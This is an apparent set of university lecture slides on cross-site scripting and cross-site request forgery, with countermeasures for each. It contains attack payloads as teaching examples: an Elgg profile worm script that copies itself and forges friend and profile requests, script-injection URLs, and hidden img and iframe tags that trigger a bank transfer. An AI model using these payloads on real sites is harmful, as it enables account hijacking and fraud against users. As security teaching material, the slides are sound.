![Page 1: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/1.jpg)
Web Applications Vulnerabilities
Lotfi ben Othmane
![Page 2: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/2.jpg)
Examples are from the book Computer Security – A hands-on Approach by Wenliang Du
2
Disclaimer
![Page 4: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/4.jpg)
4
Cross-Site Scripting in OWASP Top 10
Numbe
r 3
![Page 5: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/5.jpg)
• Cross-Site Scripting Attack
• Cross Site Request Forgery Attack
5
Plan
![Page 6: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/6.jpg)
6
Cross-Site Scripting
![Page 7: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/7.jpg)
7
Cross-Site Scripting
Target websiteAttacker
Victim
Attacker injects their code into the browser of the victim via the targeted website
![Page 8: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/8.jpg)
8
Cross-Site Scripting
Process request and generate response
Request
Response
![Page 9: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/9.jpg)
9
Non-persistent XSS
Target websiteAttacker
www.example.com/search?input=<script>alert(“attack”);</script>
www.example.com/search?input=word
Attack
![Page 10: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/10.jpg)
10
Persistent XSS
10
Attacker
www.example.com/search?input=<script>alert(“attack”);</script>
Attack
Attack
![Page 11: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/11.jpg)
1. Manipulate the DOM object and make arbitrary changes to the web page
2. Spoof requests
3. Steal information such as cookies
11
XSS Damage
![Page 12: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/12.jpg)
12
Samy Profile
![Page 13: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/13.jpg)
13
Goal: Einstein Reecognizes Samy as Smarter
![Page 14: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/14.jpg)
14
XSS in Action
USER USERNAME PASSWORD
Admin admin seedelgg
Rainman Rainman Seedrainman
Samy samy seedsamy
![Page 15: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/15.jpg)
http://www.website.com/action/friends/add?friend=42&__elgg_ts=14555&__elgg_token=7c999…..Cookie: Elgg=nstklor….
15
Capture the Add-friend Request
![Page 16: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/16.jpg)
<script is=“worm” type=“text/javascript>
Var ts = “&__elgg_ts=“+elgg.security.token.__elgg_ts;Var token = “&__elgg_token=“+elgg.security.token.__elgg_token;
Var sendurl=http://www.website.com/action/friends/add?friend=42 +token+ts
Var Ajax=new XMLHttpRequest();Ajax.open(“GET”,sendurl,true);Ajax.sendRequestHeader(“Host”,”www.website.com”)Ajax.sendRequedstHeader(….)Ajax.send()</script>
16
Construct a Script
![Page 17: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/17.jpg)
17
Inject the Script Into the Profile
<script is=“worm” type=“text/javascript>Var ts = “&__elgg_ts=“+elgg.security.token.__elgg_ts;Var token = “&__elgg_token=“+elgg.security.token.__elgg_token;
Var sendurl=http://www.website.com/action/friends/add?friend=42 +token+tsVar Ajax=new XMLHttpRequest();Ajax.open(“GET”,sendurl,true);Ajax.sendRequestHeader(“Host”,”www.website.com”)Ajax.sendRequedstHeader(….)Ajax.send()</script>
Past the code into the About me field
![Page 18: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/18.jpg)
18
Modify Visitor’s Profile
<script id=“worm” type=“text/javascript>var ts = “&__elgg_ts=“+elgg.security.token.__elgg_ts;var token = “&__elgg_token=“+elgg.security.token.__elgg_token;var desc =“&description=SAMY IS SMARTER”;Desc+=“&accesslevel[description]=2”’Var sendurl=http://www.website.com/action/friends/edit
Var Ajax=new XMLHttpRequest();Ajax.open(“POST”,sendurl,true);Ajax.sendRequestHeader(“Host”,”www.website.com”)Ajax.sendRequedstHeader(….)Ajax.send(token+ts+name+desc+guid)</script>
Past the code into the About me field
![Page 19: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/19.jpg)
19
Propagation
Attacker
Attack
Attack
Attack
Attack
Attack
![Page 20: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/20.jpg)
20
Propagation – How to Change the Script?
<script id=“worm” type=“text/javascript>var ts = “&__elgg_ts=“+elgg.security.token.__elgg_ts;var token = “&__elgg_token=“+elgg.security.token.__elgg_token;var desc =“&description=SAMY IS SMARTER”;Desc+=“&accesslevel[description]=2”’var sendurl=http://www.website.com/action/friends/edit
Var Ajax=new XMLHttpRequest();Ajax.open(“POST”,sendurl,true);Ajax.sendRequestHeader(“Host”,”www.website.com”)Ajax.sendRequedstHeader(….)Ajax.send(token+ts+name+desc+guid)</script>
Past the code into the About me field
![Page 21: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/21.jpg)
21
Propagation – How to Change the Script?
…..var headerTag=“script id=\“worm\” type=\“text/javascript\>”;var jscode=document.getElementById(“worm”).innerHTML;var tailTag=“</”+ “script>”; Var warmcode=encodeURIComponent(headerTag+jscode+tailCode);……var desc =“&description=SAMY IS SMARTER” + wormcode;
Desc+=“&accesslevel[description]=2”’Var sendurl=http://www.website.com/action/friends/edit
Var Ajax=new XMLHttpRequest();….Ajax.send(token+ts+name+desc+guid)</script>
Add the code to the description field of the target
![Page 22: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/22.jpg)
• Browser does not know whether the received code is generated by the application or injected => all is code to execute
• Countermeasures1. Using input sanitization libraries to filter data from code 2. Server encodes html to make it not executable
E.g., <script> alert(‘XSS’)</script> to “<script> alert(‘XSS’). The browser converts it to <script> alert(‘XSS’)</script> and displays it.
22
Preventing XSS Attacks
![Page 23: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/23.jpg)
23
Cross-Site Request Forgery in OWASP Top 10
Numbe
r 8
![Page 24: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/24.jpg)
24
Cross-Site Request Forgery (CSRF)
Website A Advertiser Website
Cross-site request
A’s cookie B’s cookie
Same-site request
Same-site request
Embed advertisement
![Page 25: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/25.jpg)
25
Cross-Site Request Forgery (CSRF)
www.bank32.comAttacker
Page from www.sourcesite.com
The page of the attacker website make a get or post to the target website
Forget Cross-siterequest
http://www.bank32.com/tranfer.php?to=me&amount=500
![Page 26: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/26.jpg)
<imgsrc=“http://www.bank32.com/tranfer.php?to=me&amount=500”>
<iframe=“http://www.bank32.com/tranfer.php?to=me&amount=500”> </iframe>
26
Cross-Site Request Forgery (CSRF)
Use other tags to hide the CSRF
![Page 27: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/27.jpg)
<html><body><h1> This is CSRF </h1>
<img src=http://www.elgg.com/action/freinds/add?friend=42 alt=“image” width=“1” height=“1”>
</body></html>
27
CSRF for Elgg’s Add-friend
![Page 28: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/28.jpg)
1. Use of referrer header – browser sends the source site
2. Use same-site cookie – Cookie provided by the site and has attribute SameSite. Unlike regular cookies, these are sent with same site. They are sent with cross-site requests only if vattribute alue is LAX.
3. Use secret token – pages from different site cannot access this variable. It is attached to all webpages from same site
28
Countermeasures for CSRF
![Page 29: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/29.jpg)
Thank you
Any Question?
29